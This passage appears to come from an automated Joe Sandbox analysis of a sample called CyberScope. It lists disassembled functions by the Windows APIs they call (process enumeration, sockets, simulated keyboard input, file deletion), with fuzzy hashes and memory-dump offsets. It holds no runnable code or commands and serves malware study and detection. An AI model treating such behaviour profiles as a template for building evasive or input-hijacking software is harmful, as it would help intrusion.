                                                                                    • Instruction ID: 1c732f12273cd69a5a15ca98b1677b10cf097464f0881b6130a1e3810a4ba71b
                                                                                    • Opcode Fuzzy Hash: a380845d30e8158f6f79e40e3cc29e61c7fb31917dc418bbf9d5e6fe768b6cde
                                                                                    • Instruction Fuzzy Hash: BEF05EB2551325BAE3147BA0BC4EFB73E5CEB15354F104021FB48D61A1D7B58C1486B9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f7f35703036cb2f9e08b3c3e580fba5b73bb2b1336ad97e3f7748258fffc83ef
                                                                                    • Instruction ID: a35d7c08c3ef7c02e0b53e5a66579be393fc844c587a48390c8148c62d442a15
                                                                                    • Opcode Fuzzy Hash: f7f35703036cb2f9e08b3c3e580fba5b73bb2b1336ad97e3f7748258fffc83ef
                                                                                    • Instruction Fuzzy Hash: DCC15975A0020AEFCB15CF94C894ABAB7B5FF48704F258598E605AB252D731EE81DB90
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: __alldvrm$_strrchr
                                                                                    • String ID:
                                                                                    • API String ID: 1036877536-0
                                                                                    • Opcode ID: 6b642ec63ff6d3c82f2208d2655f2e81e391796f6f1882e4d3dcf0040d879e3b
                                                                                    • Instruction ID: 6de7689dc1a02aacacfffe2e5648b7d1cee7727f03c9757ef041590b2f0462bb
                                                                                    • Opcode Fuzzy Hash: 6b642ec63ff6d3c82f2208d2655f2e81e391796f6f1882e4d3dcf0040d879e3b
                                                                                    • Instruction Fuzzy Hash: BFA137719083969FEB19CE58C8A2FAEBBE5EF71310F2441ADE9959B241C334D941C750
                                                                                    APIs
                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00230BD4,?), ref: 001F0EE0
                                                                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00230BD4,?), ref: 001F0EF8
                                                                                    • CLSIDFromProgID.OLE32(?,?,00000000,0022DCE0,000000FF,?,00000000,00000800,00000000,?,00230BD4,?), ref: 001F0F1D
                                                                                    • _memcmp.LIBVCRUNTIME ref: 001F0F3E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: FromProg$FreeTask_memcmp
                                                                                    • String ID:
                                                                                    • API String ID: 314563124-0
                                                                                    • Opcode ID: cdc76c33e02efc6a582aa9b18be72646333448a38a3e7835f9efb4a22853dde6
                                                                                    • Instruction ID: 724744dc6bb86f2ddaa061085a289263da7762d72742299a58ce3cf2f2995b9a
                                                                                    • Opcode Fuzzy Hash: cdc76c33e02efc6a582aa9b18be72646333448a38a3e7835f9efb4a22853dde6
                                                                                    • Instruction Fuzzy Hash: E4812971A00109EFCB15DFD4C988EEEB7B9FF89315F204558E606AB251DB71AE06CB60
                                                                                    APIs
                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 0021B10C
                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0021B11A
                                                                                      • Part of subcall function 0019B329: _wcslen.LIBCMT ref: 0019B333
                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 0021B1FC
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0021B20B
                                                                                      • Part of subcall function 001AE36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,001D4D73,?), ref: 001AE395
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 1991900642-0
                                                                                    • Opcode ID: b46524b58968603bd93f93194989837287ce49285a24d344f8e708100d49d007
                                                                                    • Instruction ID: a8d9cf754afdd59fa2e530b462eb3ddc3f5d1c5c392047ebb9ff5b1c6970a8a1
                                                                                    • Opcode Fuzzy Hash: b46524b58968603bd93f93194989837287ce49285a24d344f8e708100d49d007
                                                                                    • Instruction Fuzzy Hash: 1E516C71508300AFC710EF24D886A9BBBF8FF99754F40491DF98997291EB30DA15CB92
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free
                                                                                    • String ID:
                                                                                    • API String ID: 269201875-0
                                                                                    • Opcode ID: 237cb7421ea17b42d7d3e95ae8d1df10d96bc296642b872503cf00e413eecd0f
                                                                                    • Instruction ID: 93fff459ceb4cfedad1a739d8d8ce0bb540481492a2577583ec0e0ea82df2e79
                                                                                    • Opcode Fuzzy Hash: 237cb7421ea17b42d7d3e95ae8d1df10d96bc296642b872503cf00e413eecd0f
                                                                                    • Instruction Fuzzy Hash: 9E411C31A00110BBDB25BBFD9C86EBE3BA5EF75730F14062BF818D63A1DB3588415661
                                                                                    APIs
                                                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 0021255A
                                                                                    • WSAGetLastError.WSOCK32 ref: 00212568
                                                                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 002125E7
                                                                                    • WSAGetLastError.WSOCK32 ref: 002125F1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$socket
                                                                                    • String ID:
                                                                                    • API String ID: 1881357543-0
                                                                                    • Opcode ID: 48fec54d8e9187fde17abdc6e9a03873cf8a3030f06fb8a69cdaea30fb17a8d0
                                                                                    • Instruction ID: dbfe7f6ab8179a585a84b165414e3c5894f037ee2ded7ba888c85ba0077a7c3b
                                                                                    • Opcode Fuzzy Hash: 48fec54d8e9187fde17abdc6e9a03873cf8a3030f06fb8a69cdaea30fb17a8d0
                                                                                    • Instruction Fuzzy Hash: 4241F539A00201BFEB20AF24C886F6677E5AF24718F54C448F91A8F2D2C771ED52CB90
                                                                                    APIs
                                                                                    • GetWindowRect.USER32(?,?), ref: 00226D1A
                                                                                    • ScreenToClient.USER32(?,?), ref: 00226D4D
                                                                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00226DBA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ClientMoveRectScreen
                                                                                    • String ID:
                                                                                    • API String ID: 3880355969-0
                                                                                    • Opcode ID: 7c6f7b05ddc0329349a13b85907502a7975114128abd381a113c518f055f7f70
                                                                                    • Instruction ID: 12d3bc20b30bdbeaa54745081e0c70502847157c0fd0f7a12c2f639275479dc3
                                                                                    • Opcode Fuzzy Hash: 7c6f7b05ddc0329349a13b85907502a7975114128abd381a113c518f055f7f70
                                                                                    • Instruction Fuzzy Hash: 48514035A10219EFCF24DFA4E8889AE7BB6FF54320F208159F9159B290D770AD51CB50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d7f14f49ab2c373385da65fb47f98371ce07f785336ced42a0b2d5f464d00d5d
                                                                                    • Instruction ID: 73d49b61550d4f7620c79dc30904e29e2d3f5cdfdf0f0db4230af06605abee5c
                                                                                    • Opcode Fuzzy Hash: d7f14f49ab2c373385da65fb47f98371ce07f785336ced42a0b2d5f464d00d5d
                                                                                    • Instruction Fuzzy Hash: 6B41D571A44704AFD725AF78CC82FAABBADEFA8710F10852EF511DB291D771E9118780
                                                                                    APIs
                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 002061C8
                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 002061EE
                                                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00206213
                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0020623F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                    • String ID:
                                                                                    • API String ID: 3321077145-0
                                                                                    • Opcode ID: 52dfb476a7e2c90070eae53eefb147538d27a11885343cfba3fd052ee38c941a
                                                                                    • Instruction ID: 779dc5ecce36b4aab50b93d7cb194c79652284d219b5753c67b2d99a1c5b1053
                                                                                    • Opcode Fuzzy Hash: 52dfb476a7e2c90070eae53eefb147538d27a11885343cfba3fd052ee38c941a
                                                                                    • Instruction Fuzzy Hash: 31414C35A00611DFCF21EF55C555A1EBBE2EF99710B198488EC4A9B3A2CB30FD11CB91
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,001B70E1,00000000,00000000,001B8649,?,001B8649,?,00000001,001B70E1,8BE85006,00000001,001B8649,001B8649), ref: 001CDC90
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 001CDD19
                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 001CDD2B
                                                                                    • __freea.LIBCMT ref: 001CDD34
                                                                                      • Part of subcall function 001C3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,001B0165,?,?,002011D9,0000FFFF), ref: 001C3BC5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                    • String ID:
                                                                                    • API String ID: 2652629310-0
                                                                                    • Opcode ID: f15fdbbd3771611b4cd51c12272d283d4b0183e992c7e3f27f0b4c7b2df09c5a
                                                                                    • Instruction ID: c6becb0cf69ca212871d0f9f70da3a50906e89a95f6009a5916faf827b11a68d
                                                                                    • Opcode Fuzzy Hash: f15fdbbd3771611b4cd51c12272d283d4b0183e992c7e3f27f0b4c7b2df09c5a
                                                                                    • Instruction Fuzzy Hash: CA31AB32A0020AABDF259FA4EC85EEE7BB5EF60710B15416CFC05D6290EB35CD51CBA0
                                                                                    APIs
                                                                                    • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 001FB473
                                                                                    • SetKeyboardState.USER32(00000080), ref: 001FB48F
                                                                                    • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 001FB4FD
                                                                                    • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 001FB54F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                    • String ID:
                                                                                    • API String ID: 432972143-0
                                                                                    • Opcode ID: 7b5cd48716fd6df54edab091bd51e53274fc7aeeca7c4fd618a5ecaf302bc862
                                                                                    • Instruction ID: 9f34b180e32098c596ba6d781e3fafae80d8938f55aad324e853a5296e19cb4f
                                                                                    • Opcode Fuzzy Hash: 7b5cd48716fd6df54edab091bd51e53274fc7aeeca7c4fd618a5ecaf302bc862
                                                                                    • Instruction Fuzzy Hash: 39317A70A0820C6EFF34CB64DC897FA7BB5AF58310F14421AF696961E2C37889428761
                                                                                    APIs
                                                                                    • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 001FB5B8
                                                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 001FB5D4
                                                                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 001FB63B
                                                                                    • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 001FB68D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                    • String ID:
                                                                                    • API String ID: 432972143-0
                                                                                    • Opcode ID: 993f93bf84a654b64f387722c3daada41d7d197dfd62179c2b72d24d953918cd
                                                                                    • Instruction ID: 652e35940dfe74b5debe3b917f0f00c29d253a47ecf754431143570294319e54
                                                                                    • Opcode Fuzzy Hash: 993f93bf84a654b64f387722c3daada41d7d197dfd62179c2b72d24d953918cd
                                                                                    • Instruction Fuzzy Hash: 42315C30A4860CAEFF348B64C8457FA7BB6EF95330F04422AE685C61D1C3788A428B51
                                                                                    APIs
                                                                                    • ClientToScreen.USER32(?,?), ref: 002280D4
                                                                                    • GetWindowRect.USER32(?,?), ref: 0022814A
                                                                                    • PtInRect.USER32(?,?,?), ref: 0022815A
                                                                                    • MessageBeep.USER32(00000000), ref: 002281C6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                                    • String ID:
                                                                                    • API String ID: 1352109105-0
                                                                                    • Opcode ID: 421520db3c57bf8dd79922a1f6a2ad63ac456879d19dab883102c2c6803ab5b4
                                                                                    • Instruction ID: 91e4e6097203736a5289231fb3af4b2bab7da066025e39c6610259827dfa40e9
                                                                                    • Opcode Fuzzy Hash: 421520db3c57bf8dd79922a1f6a2ad63ac456879d19dab883102c2c6803ab5b4
                                                                                    • Instruction Fuzzy Hash: 2D41A430612225FFDB21CFD8E884AA977F5FF45314F1480A4E9589B2A1CB70E866CF50
                                                                                    APIs
                                                                                    • GetForegroundWindow.USER32 ref: 00222187
                                                                                      • Part of subcall function 001F4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 001F43AD
                                                                                      • Part of subcall function 001F4393: GetCurrentThreadId.KERNEL32 ref: 001F43B4
                                                                                      • Part of subcall function 001F4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,001F2F00), ref: 001F43BB
                                                                                    • GetCaretPos.USER32(?), ref: 0022219B
                                                                                    • ClientToScreen.USER32(00000000,?), ref: 002221E8
                                                                                    • GetForegroundWindow.USER32 ref: 002221EE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                    • String ID:
                                                                                    • API String ID: 2759813231-0
                                                                                    • Opcode ID: ddfbdc3a885fcc831cde7eab5cb41c34fbdfbce26f99462d474bcfeefea4766c
                                                                                    • Instruction ID: 9210bbf57c261948c85750af093489e07be9b1d626c668add09f0b4b70474fb9
                                                                                    • Opcode Fuzzy Hash: ddfbdc3a885fcc831cde7eab5cb41c34fbdfbce26f99462d474bcfeefea4766c
                                                                                    • Instruction Fuzzy Hash: FD315271D10219AFCB04EFA5C885CAEB7F8EF58304B50446AE515E7212DB719E45CBA0
                                                                                    APIs
                                                                                      • Part of subcall function 001941EA: _wcslen.LIBCMT ref: 001941EF
                                                                                    • _wcslen.LIBCMT ref: 001FE8E2
                                                                                    • _wcslen.LIBCMT ref: 001FE8F9
                                                                                    • _wcslen.LIBCMT ref: 001FE924
                                                                                    • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 001FE92F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$ExtentPoint32Text
                                                                                    • String ID:
                                                                                    • API String ID: 3763101759-0
                                                                                    • Opcode ID: edb422d8a2885fcee6eeb0e579b5cf44efd7effb9f5e9a9780fdc3e12c0cb009
                                                                                    • Instruction ID: 3f4dff2ed8e74d41e8ee4c6b0bd4ab530eadd5476c4f43c3a07bd25ca7720979
                                                                                    • Opcode Fuzzy Hash: edb422d8a2885fcee6eeb0e579b5cf44efd7effb9f5e9a9780fdc3e12c0cb009
                                                                                    • Instruction Fuzzy Hash: 0921E571900218AFCB14AFA8D981BFEBBF8EF55750F104064E904BB251D7709E41C7A1
                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNEL32(?,0022DC30), ref: 001FDBA6
                                                                                    • GetLastError.KERNEL32 ref: 001FDBB5
                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 001FDBC4
                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0022DC30), ref: 001FDC21
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                    • String ID:
                                                                                    • API String ID: 2267087916-0
                                                                                    • Opcode ID: f3cf5ab79410437fe1e56f37319659177d5eac252737d5c8ba445a8f6ec0c2c2
                                                                                    • Instruction ID: a97cbff8620030f19aa287972a9d4dc4da3b16a25f7b1211d3e41c3400731f54
                                                                                    • Opcode Fuzzy Hash: f3cf5ab79410437fe1e56f37319659177d5eac252737d5c8ba445a8f6ec0c2c2
                                                                                    • Instruction Fuzzy Hash: 5321F7305083099F8710DF64E98487FB7E9EF66364F100A1DF598C72A2DB30D946CB82
                                                                                    APIs
                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 002232A6
                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 002232C0
                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 002232CE
                                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 002232DC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
